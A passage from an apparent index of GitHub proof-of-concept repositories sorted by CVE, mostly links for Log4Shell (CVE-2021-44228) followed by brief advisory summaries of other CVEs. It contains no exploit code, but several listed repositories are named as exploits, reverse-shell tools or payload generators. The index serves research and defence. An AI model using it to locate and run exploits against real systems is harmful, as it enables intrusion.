[tuyenee/Log4shell](https://github.com/tuyenee/Log4shell) +- [JiuBanSec/Log4j-CVE-2021-44228](https://github.com/JiuBanSec/Log4j-CVE-2021-44228) +- [ycdxsb/Log4Shell-CVE-2021-44228-ENV](https://github.com/ycdxsb/Log4Shell-CVE-2021-44228-ENV) +- [avwolferen/Sitecore.Solr-log4j-mitigation](https://github.com/avwolferen/Sitecore.Solr-log4j-mitigation) +- [kek-Sec/log4j-scanner-CVE-2021-44228](https://github.com/kek-Sec/log4j-scanner-CVE-2021-44228) +- [Camphul/log4shell-spring-framework-research](https://github.com/Camphul/log4shell-spring-framework-research) +- [lov3r/cve-2021-44228-log4j-exploits](https://github.com/lov3r/cve-2021-44228-log4j-exploits) +- [sinakeshmiri/log4jScan](https://github.com/sinakeshmiri/log4jScan) +- [0xDexter0us/Log4J-Scanner](https://github.com/0xDexter0us/Log4J-Scanner) +- [LutziGoz/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228](https://github.com/LutziGoz/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228) +- [0xsyr0/Log4Shell](https://github.com/0xsyr0/Log4Shell) +- [1hakusai1/log4j-rce-CVE-2021-44228](https://github.com/1hakusai1/log4j-rce-CVE-2021-44228) +- [jeffli1024/log4j-rce-test](https://github.com/jeffli1024/log4j-rce-test) +- [zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service](https://github.com/zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service) +- [manuel-alvarez-alvarez/log4j-cve-2021-44228](https://github.com/manuel-alvarez-alvarez/log4j-cve-2021-44228) +- [VNYui/CVE-2021-44228](https://github.com/VNYui/CVE-2021-44228) +- [flxhaas/Scan-CVE-2021-44228](https://github.com/flxhaas/Scan-CVE-2021-44228) +- [justakazh/Log4j-CVE-2021-44228](https://github.com/justakazh/Log4j-CVE-2021-44228) +- [irgoncalves/f5-waf-quick-patch-cve-2021-44228](https://github.com/irgoncalves/f5-waf-quick-patch-cve-2021-44228) +- [madCdan/JndiLookup](https://github.com/madCdan/JndiLookup) +- [Koupah/MC-Log4j-Patcher](https://github.com/Koupah/MC-Log4j-Patcher) +- [AlexandreHeroux/Fix-CVE-2021-44228](https://github.com/AlexandreHeroux/Fix-CVE-2021-44228) +- [kossatzd/log4j-CVE-2021-44228-test](https://github.com/kossatzd/log4j-CVE-2021-44228-test) +- [tobiasoed/log4j-CVE-2021-44228](https://github.com/tobiasoed/log4j-CVE-2021-44228) +- [hackinghippo/log4shell_ioc_ips](https://github.com/hackinghippo/log4shell_ioc_ips) +- [p3dr16k/log4j-1.2.15-mod](https://github.com/p3dr16k/log4j-1.2.15-mod) +- [claranet/ansible-role-log4shell](https://github.com/claranet/ansible-role-log4shell) +- [taurusxin/CVE-2021-44228](https://github.com/taurusxin/CVE-2021-44228) +- [corelight/cve-2021-44228](https://github.com/corelight/cve-2021-44228) +- [rodfer0x80/log4j2-prosecutor](https://github.com/rodfer0x80/log4j2-prosecutor) +- [yanghaoi/CVE-2021-44228_Log4Shell](https://github.com/yanghaoi/CVE-2021-44228_Log4Shell) +- [lfama/log4j_checker](https://github.com/lfama/log4j_checker) +- [threatmonit/Log4j-IOCs](https://github.com/threatmonit/Log4j-IOCs) +- [ben-smash/l4j-info](https://github.com/ben-smash/l4j-info) +- [strawhatasif/log4j-test](https://github.com/strawhatasif/log4j-test) +- [giterlizzi/nmap-log4shell](https://github.com/giterlizzi/nmap-log4shell) +- [tica506/Siem-queries-for-CVE-2021-44228](https://github.com/tica506/Siem-queries-for-CVE-2021-44228) +- [chilit-nl/log4shell-example](https://github.com/chilit-nl/log4shell-example) +- [Occamsec/log4j-checker](https://github.com/Occamsec/log4j-checker) +- [snatalius/log4j2-CVE-2021-44228-poc-local](https://github.com/snatalius/log4j2-CVE-2021-44228-poc-local) +- [Contrast-Security-OSS/CVE-2021-44228](https://github.com/Contrast-Security-OSS/CVE-2021-44228) +- [back2root/log4shell-rex](https://github.com/back2root/log4shell-rex) +- [alexbakker/log4shell-tools](https://github.com/alexbakker/log4shell-tools) +- [perryflynn/find-log4j](https://github.com/perryflynn/find-log4j) +- [alpacamybags118/log4j-cve-2021-44228-sample](https://github.com/alpacamybags118/log4j-cve-2021-44228-sample) +- [sandarenu/log4j2-issue-check](https://github.com/sandarenu/log4j2-issue-check) +- [roticagas/CVE-2021-44228-Demo](https://github.com/roticagas/CVE-2021-44228-Demo) +- [Woahd/log4j-urlscanner](https://github.com/Woahd/log4j-urlscanner) +- [faisalfs10x/Log4j2-CVE-2021-44228-revshell](https://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell) +- [gcmurphy/chk_log4j](https://github.com/gcmurphy/chk_log4j) +- [0xInfection/LogMePwn](https://github.com/0xInfection/LogMePwn) +- [toramanemre/apache-solr-log4j-CVE-2021-44228](https://github.com/toramanemre/apache-solr-log4j-CVE-2021-44228) +- [codiobert/log4j-scanner](https://github.com/codiobert/log4j-scanner) +- [cbuschka/log4j2-rce-recap](https://github.com/cbuschka/log4j2-rce-recap) +- [andrii-kovalenko-celonis/log4j-vulnerability-demo](https://github.com/andrii-kovalenko-celonis/log4j-vulnerability-demo) +- [dark-ninja10/Log4j-CVE-2021-44228](https://github.com/dark-ninja10/Log4j-CVE-2021-44228) +- [fox-it/log4j-finder](https://github.com/fox-it/log4j-finder) +- [34zY/JNDI-Exploit-1.2-log4shell](https://github.com/34zY/JNDI-Exploit-1.2-log4shell) +- [didoatanasov/cve-2021-44228](https://github.com/didoatanasov/cve-2021-44228) +- [ReynerGonzalez/Security-Log4J-Tester](https://github.com/ReynerGonzalez/Security-Log4J-Tester) +- [ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228](https://github.com/ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228) +- [wortell/log4j](https://github.com/wortell/log4j) +- [municipalparkingservices/CVE-2021-44228-Scanner](https://github.com/municipalparkingservices/CVE-2021-44228-Scanner) +- [BinaryDefense/log4j-honeypot-flask](https://github.com/BinaryDefense/log4j-honeypot-flask) +- [MalwareTech/Log4jTools](https://github.com/MalwareTech/Log4jTools) +- [mufeedvh/log4jail](https://github.com/mufeedvh/log4jail) +- [guerzon/log4shellpoc](https://github.com/guerzon/log4shellpoc) +- [ab0x90/CVE-2021-44228_PoC](https://github.com/ab0x90/CVE-2021-44228_PoC) +- [stripe/log4j-remediation-tools](https://github.com/stripe/log4j-remediation-tools) +- [xsultan/log4jshield](https://github.com/xsultan/log4jshield) +- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder) +- [0xThiebaut/CVE-2021-44228](https://github.com/0xThiebaut/CVE-2021-44228) +- [CERTCC/CVE-2021-44228_scanner](https://github.com/CERTCC/CVE-2021-44228_scanner) +- [CrackerCat/CVE-2021-44228-Log4j-Payloads](https://github.com/CrackerCat/CVE-2021-44228-Log4j-Payloads) +- [dbzoo/log4j_scanner](https://github.com/dbzoo/log4j_scanner) +- [jeremyrsellars/CVE-2021-44228_scanner](https://github.com/jeremyrsellars/CVE-2021-44228_scanner) +- [JustinDPerkins/C1-WS-LOG4SHELL](https://github.com/JustinDPerkins/C1-WS-LOG4SHELL) +- [VinniMarcon/Log4j-Updater](https://github.com/VinniMarcon/Log4j-Updater) +- [bhprin/log4j-vul](https://github.com/bhprin/log4j-vul) +- [avirahul007/CVE-2021-44228](https://github.com/avirahul007/CVE-2021-44228) +- [rgl/log4j-log4shell-playground](https://github.com/rgl/log4j-log4shell-playground) +- [anuvindhs/how-to-check-patch-secure-log4j-CVE-2021-44228](https://github.com/anuvindhs/how-to-check-patch-secure-log4j-CVE-2021-44228) +- [KeysAU/Get-log4j-Windows.ps1](https://github.com/KeysAU/Get-log4j-Windows.ps1) +- [kubearmor/log4j-CVE-2021-44228](https://github.com/kubearmor/log4j-CVE-2021-44228) +- [jyotisahu98/logpresso-CVE-2021-44228-Scanner](https://github.com/jyotisahu98/logpresso-CVE-2021-44228-Scanner) +- [gitlab-de/log4j-resources](https://github.com/gitlab-de/log4j-resources) +- [redhuntlabs/Log4JHunt](https://github.com/redhuntlabs/Log4JHunt) +- [mss/log4shell-hotfix-side-effect](https://github.com/mss/log4shell-hotfix-side-effect) +- [MeterianHQ/log4j-vuln-coverage-check](https://github.com/MeterianHQ/log4j-vuln-coverage-check) +- [sebiboga/jmeter-fix-cve-2021-44228-windows](https://github.com/sebiboga/jmeter-fix-cve-2021-44228-windows) +- [mitiga/log4shell-cloud-scanner](https://github.com/mitiga/log4shell-cloud-scanner) +- [isuruwa/Log4j](https://github.com/isuruwa/Log4j) +- [honeynet/log4shell-data](https://github.com/honeynet/log4shell-data) +- [inettgmbh/checkmk-log4j-scanner](https://github.com/inettgmbh/checkmk-log4j-scanner) +- [b1tm0n3r/CVE-2021-44228](https://github.com/b1tm0n3r/CVE-2021-44228) +- [VerveIndustrialProtection/CVE-2021-44228-Log4j](https://github.com/VerveIndustrialProtection/CVE-2021-44228-Log4j) +- [alenazi90/log4j](https://github.com/alenazi90/log4j) +- [pmontesd/log4j-cve-2021-44228](https://github.com/pmontesd/log4j-cve-2021-44228) +- [LiveOverflow/log4shell](https://github.com/LiveOverflow/log4shell) +- [aws-samples/kubernetes-log4j-cve-2021-44228-node-agent](https://github.com/aws-samples/kubernetes-log4j-cve-2021-44228-node-agent) +- [michaelsanford/Log4Shell-Honeypot](https://github.com/michaelsanford/Log4Shell-Honeypot) +- [thomaspatzke/Log4Pot](https://github.com/thomaspatzke/Log4Pot) +- [ubitech/cve-2021-44228-rce-poc](https://github.com/ubitech/cve-2021-44228-rce-poc) +- [rv4l3r3/log4v-vuln-check](https://github.com/rv4l3r3/log4v-vuln-check) +- [dpomnean/log4j_scanner_wrapper](https://github.com/dpomnean/log4j_scanner_wrapper) +- [roxas-tan/CVE-2021-44228](https://github.com/roxas-tan/CVE-2021-44228) +- [shamo0/CVE-2021-44228](https://github.com/shamo0/CVE-2021-44228) +- [snow0715/log4j-Scan-Burpsuite](https://github.com/snow0715/log4j-Scan-Burpsuite) +- [Joefreedy/Log4j-Windows-Scanner](https://github.com/Joefreedy/Log4j-Windows-Scanner) +- [Nanitor/log4fix](https://github.com/Nanitor/log4fix) +- [Gyrfalc0n/scanlist-log4j](https://github.com/Gyrfalc0n/scanlist-log4j) +- [korteke/log4shell-demo](https://github.com/korteke/log4shell-demo) +- [recanavar/vuln_spring_log4j2](https://github.com/recanavar/vuln_spring_log4j2) +- [DXC-StrikeForce/Burp-Log4j-HammerTime](https://github.com/DXC-StrikeForce/Burp-Log4j-HammerTime) +- [andalik/log4j-filescan](https://github.com/andalik/log4j-filescan) +- [lonecloud/CVE-2021-44228-Apache-Log4j](https://github.com/lonecloud/CVE-2021-44228-Apache-Log4j) +- [gyaansastra/CVE-2021-44228](https://github.com/gyaansastra/CVE-2021-44228) +- [axisops/CVE-2021-44228](https://github.com/axisops/CVE-2021-44228) +- [kal1gh0st/MyLog4Shell](https://github.com/kal1gh0st/MyLog4Shell) +- [hozyx/log4shell](https://github.com/hozyx/log4shell) +- [andypitcher/Log4J_checker](https://github.com/andypitcher/Log4J_checker) +- [Vulnmachines/log4j-cve-2021-44228](https://github.com/Vulnmachines/log4j-cve-2021-44228) +- [kannthu/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/kannthu/CVE-2021-44228-Apache-Log4j-Rce) +- [Kr0ff/CVE-2021-44228](https://github.com/Kr0ff/CVE-2021-44228) +- [suuhm/log4shell4shell](https://github.com/suuhm/log4shell4shell) +- [wajda/log4shell-test-exploit](https://github.com/wajda/log4shell-test-exploit) +- [obscuritylabs/log4shell-poc-lab](https://github.com/obscuritylabs/log4shell-poc-lab) +- [Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228](https://github.com/Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228) +- [Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE](https://github.com/Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE) +- [rohan-flutterint/CVE-2021-44228_scanner](https://github.com/rohan-flutterint/CVE-2021-44228_scanner) +- [sysadmin0815/Fix-Log4j-PowershellScript](https://github.com/sysadmin0815/Fix-Log4j-PowershellScript) +- [RenYuH/log4j-lookups-vulnerability](https://github.com/RenYuH/log4j-lookups-vulnerability) +- [scheibling/py-log4shellscanner](https://github.com/scheibling/py-log4shellscanner) +- [zaneef/CVE-2021-44228](https://github.com/zaneef/CVE-2021-44228) +- [metodidavidovic/log4j-quick-scan](https://github.com/metodidavidovic/log4j-quick-scan) +- [WatchGuard-Threat-Lab/log4shell-iocs](https://github.com/WatchGuard-Threat-Lab/log4shell-iocs) +- [Aschen/log4j-patched](https://github.com/Aschen/log4j-patched) +- [Nikolas-Charalambidis/cve-2021-44228](https://github.com/Nikolas-Charalambidis/cve-2021-44228) +- [m0rath/detect-log4j-exploitable](https://github.com/m0rath/detect-log4j-exploitable) +- [nu11secur1ty/CVE-2021-44228-VULN-APP](https://github.com/nu11secur1ty/CVE-2021-44228-VULN-APP) +- [ankur-katiyar/log4j-docker](https://github.com/ankur-katiyar/log4j-docker) +- [immunityinc/Log4j-JNDIServer](https://github.com/immunityinc/Log4j-JNDIServer) +- [DANSI/PowerShell-Log4J-Scanner](https://github.com/DANSI/PowerShell-Log4J-Scanner) +- [suniastar/scan-log4shell](https://github.com/suniastar/scan-log4shell) +- [shivakumarjayaraman/log4jvulnerability-CVE-2021-44228](https://github.com/shivakumarjayaraman/log4jvulnerability-CVE-2021-44228) +- [j3kz/CVE-2021-44228-PoC](https://github.com/j3kz/CVE-2021-44228-PoC) +- [Apipia/log4j-pcap-activity](https://github.com/Apipia/log4j-pcap-activity) +- [axelcurmi/log4shell-docker-lab](https://github.com/axelcurmi/log4shell-docker-lab) +- [otaviokr/log4j-2021-vulnerability-study](https://github.com/otaviokr/log4j-2021-vulnerability-study) +- [kkyehit/log4j_CVE-2021-44228](https://github.com/kkyehit/log4j_CVE-2021-44228) +- [trickyearlobe/inspec-log4j](https://github.com/trickyearlobe/inspec-log4j) +- [TheInterception/Log4J-Simulation-Tool](https://github.com/TheInterception/Log4J-Simulation-Tool) +- [KeysAU/Get-log4j-Windows-local](https://github.com/KeysAU/Get-log4j-Windows-local) +- [mschmnet/Log4Shell-demo](https://github.com/mschmnet/Log4Shell-demo) +- [Rk-000/Log4j_scan_Advance](https://github.com/Rk-000/Log4j_scan_Advance) +- [puzzlepeaches/Log4jCenter](https://github.com/puzzlepeaches/Log4jCenter) +- [Labout/log4shell-rmi-poc](https://github.com/Labout/log4shell-rmi-poc) +- [TotallyNotAHaxxer/f-for-java](https://github.com/TotallyNotAHaxxer/f-for-java) +- [spasam/log4j2-exploit](https://github.com/spasam/log4j2-exploit) +- [bumheehan/cve-2021-44228-log4j-test](https://github.com/bumheehan/cve-2021-44228-log4j-test) +- [cergo123/log4j-dork-scanner](https://github.com/cergo123/log4j-dork-scanner) +- [dmitsuo/log4shell-war-fixer](https://github.com/dmitsuo/log4shell-war-fixer) +- [Y0-kan/Log4jShell-Scan](https://github.com/Y0-kan/Log4jShell-Scan) +- [julian911015/Log4j-Scanner-Exploit](https://github.com/julian911015/Log4j-Scanner-Exploit) +- [intel-xeon/CVE-2021-44228---detection-with-PowerShell](https://github.com/intel-xeon/CVE-2021-44228---detection-with-PowerShell) +- [chandru-gunasekaran/log4j-fix-CVE-2021-44228](https://github.com/chandru-gunasekaran/log4j-fix-CVE-2021-44228) +- [erickrr-bd/TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp) +- [snapattack/damn-vulnerable-log4j-app](https://github.com/snapattack/damn-vulnerable-log4j-app) +- [sassoftware/loguccino](https://github.com/sassoftware/loguccino) +- [xx-zhang/apache-log4j2-CVE-2021-44228](https://github.com/xx-zhang/apache-log4j2-CVE-2021-44228) +- [r00thunter/Log4Shell-Scanner](https://github.com/r00thunter/Log4Shell-Scanner) +- [mn-io/log4j-spring-vuln-poc](https://github.com/mn-io/log4j-spring-vuln-poc) +- [rejupillai/log4j2-hack-springboot](https://github.com/rejupillai/log4j2-hack-springboot) +- [lucab85/log4j-cve-2021-44228](https://github.com/lucab85/log4j-cve-2021-44228) +- [BabooPan/Log4Shell-CVE-2021-44228-Demo](https://github.com/BabooPan/Log4Shell-CVE-2021-44228-Demo) +- [ossie-git/log4shell_sentinel](https://github.com/ossie-git/log4shell_sentinel) +- [r00thunter/Log4Shell](https://github.com/r00thunter/Log4Shell) +- [asyzdykov/cve-2021-44228-fix-jars](https://github.com/asyzdykov/cve-2021-44228-fix-jars) +- [BJLIYANLIANG/log4j-scanner](https://github.com/BJLIYANLIANG/log4j-scanner) +- [badb33f/Apache-Log4j-POC](https://github.com/badb33f/Apache-Log4j-POC) +- [TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit](https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit) +- [lucab85/ansible-role-log4shell](https://github.com/lucab85/ansible-role-log4shell) +- [grimch/log4j-CVE-2021-44228-workaround](https://github.com/grimch/log4j-CVE-2021-44228-workaround) +- [cybersecurityworks553/log4j-shell-csw](https://github.com/cybersecurityworks553/log4j-shell-csw) +- [Toolsec/log4j-scan](https://github.com/Toolsec/log4j-scan) +- [puzzlepeaches/Log4jUnifi](https://github.com/puzzlepeaches/Log4jUnifi) +- [many-fac3d-g0d/apache-tomcat-log4j](https://github.com/many-fac3d-g0d/apache-tomcat-log4j) +- [marcourbano/CVE-2021-44228](https://github.com/marcourbano/CVE-2021-44228) +- [bsigouin/log4shell-vulnerable-app](https://github.com/bsigouin/log4shell-vulnerable-app) +- [ToxicEnvelope/XSYS-Log4J2Shell-Ex](https://github.com/ToxicEnvelope/XSYS-Log4J2Shell-Ex) +- [felipe8398/ModSec-log4j2](https://github.com/felipe8398/ModSec-log4j2) +- [ceyhuncamli/Log4j_Attacker_IPList](https://github.com/ceyhuncamli/Log4j_Attacker_IPList) +- [mazhar-hassan/log4j-vulnerability](https://github.com/mazhar-hassan/log4j-vulnerability) +- [xungzzz/VTI-IOCs-CVE-2021-44228](https://github.com/xungzzz/VTI-IOCs-CVE-2021-44228) +- [s-retlaw/l4s_poc](https://github.com/s-retlaw/l4s_poc) +- [Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main](https://github.com/Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main) +- [yesspider-hacker/log4j-payload-generator](https://github.com/yesspider-hacker/log4j-payload-generator) +- [LinkMJB/log4shell_scanner](https://github.com/LinkMJB/log4shell_scanner) +- [NS-Sp4ce/Vm4J](https://github.com/NS-Sp4ce/Vm4J) +- [PoneyClairDeLune/LogJackFix](https://github.com/PoneyClairDeLune/LogJackFix) +- [MarceloLeite2604/log4j-vulnerability](https://github.com/MarceloLeite2604/log4j-vulnerability) +- [romanutti/log4shell-vulnerable-app](https://github.com/romanutti/log4shell-vulnerable-app) +- [mklinkj/log4j2-test](https://github.com/mklinkj/log4j2-test) +- [4jfinder/4jfinder.github.io](https://github.com/4jfinder/4jfinder.github.io) +- [alexpena5635/CVE-2021-44228_scanner-main-Modified-](https://github.com/alexpena5635/CVE-2021-44228_scanner-main-Modified-) +- [Vulnmachines/log4jshell_CVE-2021-44228](https://github.com/Vulnmachines/log4jshell_CVE-2021-44228) +- [mr-vill4in/log4j-fuzzer](https://github.com/mr-vill4in/log4j-fuzzer) +- [mebibite/log4jhound](https://github.com/mebibite/log4jhound) +- [jxerome/log4shell](https://github.com/jxerome/log4shell) +- [solitarysp/Log4j-CVE-2021-44228](https://github.com/solitarysp/Log4j-CVE-2021-44228) +- [sdogancesur/log4j_github_repository](https://github.com/sdogancesur/log4j_github_repository) +- [jrocia/Search-log4Jvuln-AppScanSTD](https://github.com/jrocia/Search-log4Jvuln-AppScanSTD) +- [aajuvonen/log4stdin](https://github.com/aajuvonen/log4stdin) +- [arnaudluti/PS-CVE-2021-44228](https://github.com/arnaudluti/PS-CVE-2021-44228) +- [ColdFusionX/CVE-2021-44228-Log4Shell-POC](https://github.com/ColdFusionX/CVE-2021-44228-Log4Shell-POC) +- [robrankin/cve-2021-44228-waf-tests](https://github.com/robrankin/cve-2021-44228-waf-tests) +- [0xalwayslucky/log4j-polkit-poc](https://github.com/0xalwayslucky/log4j-polkit-poc) +- [y-security/yLog4j](https://github.com/y-security/yLog4j) +- [FeryaelJustice/Log4Shell](https://github.com/FeryaelJustice/Log4Shell) +- [hotpotcookie/CVE-2021-44228-white-box](https://github.com/hotpotcookie/CVE-2021-44228-white-box) +- [s-retlaw/l4srs](https://github.com/s-retlaw/l4srs) +- [Ananya-0306/Log-4j-scanner](https://github.com/Ananya-0306/Log-4j-scanner) +- [paulvkitor/log4shellwithlog4j2_13_3](https://github.com/paulvkitor/log4shellwithlog4j2_13_3) +- [MiguelM001/vulescanjndilookup](https://github.com/MiguelM001/vulescanjndilookup) +- [Jun-5heng/CVE-2021-44228](https://github.com/Jun-5heng/CVE-2021-44228) +- [honypot/CVE-2021-44228](https://github.com/honypot/CVE-2021-44228) +- [honypot/CVE-2021-44228-vuln-app](https://github.com/honypot/CVE-2021-44228-vuln-app) +- [manishkanyal/log4j-scanner](https://github.com/manishkanyal/log4j-scanner) +- [TPower2112/Writing-Sample-1](https://github.com/TPower2112/Writing-Sample-1) +- [Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228](https://github.com/Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228) +- [r3kind1e/Log4Shell-obfuscated-payloads-generator](https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator) +- [Phineas09/CVE-2021-44228](https://github.com/Phineas09/CVE-2021-44228) +- [yuuki1967/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/yuuki1967/CVE-2021-44228-Apache-Log4j-Rce) +- [moshuum/tf-log4j-aws-poc](https://github.com/moshuum/tf-log4j-aws-poc) +- [jaehnri/CVE-2021-44228](https://github.com/jaehnri/CVE-2021-44228) +- [ra890927/Log4Shell-CVE-2021-44228-Demo](https://github.com/ra890927/Log4Shell-CVE-2021-44228-Demo) +- [vidrez/Ethical-Hacking-Report-Log4j](https://github.com/vidrez/Ethical-Hacking-Report-Log4j) +- [vino-theva/CVE-2021-44228](https://github.com/vino-theva/CVE-2021-44228) +- [tharindudh/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228](https://github.com/tharindudh/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228) +- [eurogig/jankybank](https://github.com/eurogig/jankybank) +- [digital-dev/Log4j-CVE-2021-44228-Remediation](https://github.com/digital-dev/Log4j-CVE-2021-44228-Remediation) +- [ocastel/log4j-shell-poc](https://github.com/ocastel/log4j-shell-poc) +- [bcdunbar/CVE-2021-44228-poc](https://github.com/bcdunbar/CVE-2021-44228-poc) +- [srcporter/CVE-2021-44228](https://github.com/srcporter/CVE-2021-44228) +- [Nexolanta/log4j2_CVE-2021-44228](https://github.com/Nexolanta/log4j2_CVE-2021-44228) +- [demining/Log4j-Vulnerability](https://github.com/demining/Log4j-Vulnerability) +- [pierpaolosestito-dev/Log4Shell-CVE-2021-44228-PoC](https://github.com/pierpaolosestito-dev/Log4Shell-CVE-2021-44228-PoC) +- [Sumitpathania03/LOG4J-CVE-2021-44228](https://github.com/Sumitpathania03/LOG4J-CVE-2021-44228) +- [Sma-Das/Log4j-PoC](https://github.com/Sma-Das/Log4j-PoC) +- [53buahapel/log4shell-vulnweb](https://github.com/53buahapel/log4shell-vulnweb) +- [demonrvm/Log4ShellRemediation](https://github.com/demonrvm/Log4ShellRemediation) +- [funcid/log4j-exploit-fork-bomb](https://github.com/funcid/log4j-exploit-fork-bomb) +- [MrHarshvardhan/PY-Log4j-RCE-Scanner](https://github.com/MrHarshvardhan/PY-Log4j-RCE-Scanner) +- [Muhammad-Ali007/Log4j_CVE-2021-44228](https://github.com/Muhammad-Ali007/Log4j_CVE-2021-44228) +- [Tai-e/CVE-2021-44228](https://github.com/Tai-e/CVE-2021-44228) +- [LucasPDiniz/CVE-2021-44228](https://github.com/LucasPDiniz/CVE-2021-44228) +- [felixslama/log4shell-minecraft-demo](https://github.com/felixslama/log4shell-minecraft-demo) +- [ShlomiRex/log4shell_lab](https://github.com/ShlomiRex/log4shell_lab) +- [dcm2406/CVE-Lab](https://github.com/dcm2406/CVE-Lab) +- [scabench/l4j-tp1](https://github.com/scabench/l4j-tp1) +- [scabench/l4j-fp1](https://github.com/scabench/l4j-fp1) +- [KtokKawu/l4s-vulnapp](https://github.com/KtokKawu/l4s-vulnapp) +- [sec13b/CVE-2021-44228-POC](https://github.com/sec13b/CVE-2021-44228-POC) +- [KirkDJohnson/Wireshark](https://github.com/KirkDJohnson/Wireshark) +- [YangHyperData/LOGJ4_PocShell_CVE-2021-44228](https://github.com/YangHyperData/LOGJ4_PocShell_CVE-2021-44228) +- [Hoanle396/CVE-2021-44228-demo](https://github.com/Hoanle396/CVE-2021-44228-demo) +- [tadash10/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment](https://github.com/tadash10/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment) +- [cve-2021-44228/cve-2021-44228](https://github.com/cve-2021-44228/cve-2021-44228) +- [asd58584388/CVE-2021-44228](https://github.com/asd58584388/CVE-2021-44228) +- [OtisSymbos/CVE-2021-44228-Log4Shell-](https://github.com/OtisSymbos/CVE-2021-44228-Log4Shell-) +- [safeer-accuknox/log4j-shell-poc](https://github.com/safeer-accuknox/log4j-shell-poc) +- [Carlos-Mesquita/TPASLog4ShellPoC](https://github.com/Carlos-Mesquita/TPASLog4ShellPoC) +- [AhmedMansour93/-Unveiling-the-Lessons-from-Log4Shell-A-Wake-Up-Call-for-Cybersecurity-](https://github.com/AhmedMansour93/-Unveiling-the-Lessons-from-Log4Shell-A-Wake-Up-Call-for-Cybersecurity-) +- [Super-Binary/cve-2021-44228](https://github.com/Super-Binary/cve-2021-44228) + +### CVE-2021-44255 (2022-01-31) + +Authenticated remote code execution in MotionEye <= 0.42.1 and MotioneEyeOS <= 20200606 allows a remote attacker to upload a configuration backup file containing a malicious python pickle file which will execute arbitrary code on the server. + + +- [pizza-power/motioneye-authenticated-RCE](https://github.com/pizza-power/motioneye-authenticated-RCE) + +### CVE-2021-44270 +- [pinpinsec/CVE-2021-44270](https://github.com/pinpinsec/CVE-2021-44270) + +### CVE-2021-44428 (2021-11-29) + +Pinkie 2.15 allows remote attackers to cause a denial of service (daemon crash) via a TFTP read (RRQ) request, aka opcode 1. + + +- [z3bul0n/log4jtest](https://github.com/z3bul0n/log4jtest) + +### CVE-2021-44521 (2022-02-11) + +When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE. + + +- [WoodenKlaas/CVE-2021-44521](https://github.com/WoodenKlaas/CVE-2021-44521) +- [Yeyvo/poc-CVE-2021-44521](https://github.com/Yeyvo/poc-CVE-2021-44521) + +### CVE-2021-44529 (2021-12-08) + +A code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) allows an unauthenticated user to execute arbitrary code with limited permissions (nobody). + + +- [jkana/CVE-2021-44529](https://github.com/jkana/CVE-2021-44529) +- [jax7sec/CVE-2021-44529](https://github.com/jax7sec/CVE-2021-44529) + +### CVE-2021-44582 (2022-06-10) + +A Privilege Escalation vulnerability exists in Sourcecodester Money Transfer Management System 1.0, which allows a remote malicious user to gain elevated privileges to the Admin role via any URL. + + +- [warmachine-57/CVE-2021-44582](https://github.com/warmachine-57/CVE-2021-44582) + +### CVE-2021-44593 (2022-01-21) + +Simple College Website 1.0 is vulnerable to unauthenticated file upload & remote code execution via UNION-based SQL injection in the username parameter on /admin/login.php. + + +- [Mister-Joe/CVE-2021-44593](https://github.com/Mister-Joe/CVE-2021-44593) + +### CVE-2021-44731 (2022-02-17) + +A race condition existed in the snapd 2.54.2 snap-confine binary when preparing a private mount namespace for a snap. This could allow a local attacker to gain root privileges by bind-mounting their own contents inside the snap's private mount namespace and causing snap-confine to execute arbitrary code and hence gain privilege escalation. Fixed in snapd versions 2.54.3+18.04, 2.54.3+20.04 and 2.54.3+21.10.1 + + +- [deeexcee-io/CVE-2021-44731-snap-confine-SUID](https://github.com/deeexcee-io/CVE-2021-44731-snap-confine-SUID) + +### CVE-2021-44733 (2021-12-22) + +A use-after-free exists in drivers/tee/tee_shm.c in the TEE subsystem in the Linux kernel through 5.15.11. This occurs because of a race condition in tee_shm_get_from_id during an attempt to free a shared memory object. + + +- [pjlantz/optee-qemu](https://github.com/pjlantz/optee-qemu) + +### CVE-2021-44790 (2021-12-20) + +A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier. + + +- [nuPacaChi/-CVE-2021-44790](https://github.com/nuPacaChi/-CVE-2021-44790) + +### CVE-2021-44827 (2022-03-04) + +There is remote authenticated OS command injection on TP-Link Archer C20i 0.9.1 3.2 v003a.0 Build 170221 Rel.55462n devices vie the X_TP_ExternalIPv6Address HTTP parameter, allowing a remote attacker to run arbitrary commands on the router with root privileges. + + +- [full-disclosure/CVE-2021-44827](https://github.com/full-disclosure/CVE-2021-44827) + +### CVE-2021-44832 (2021-12-28) + +Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution 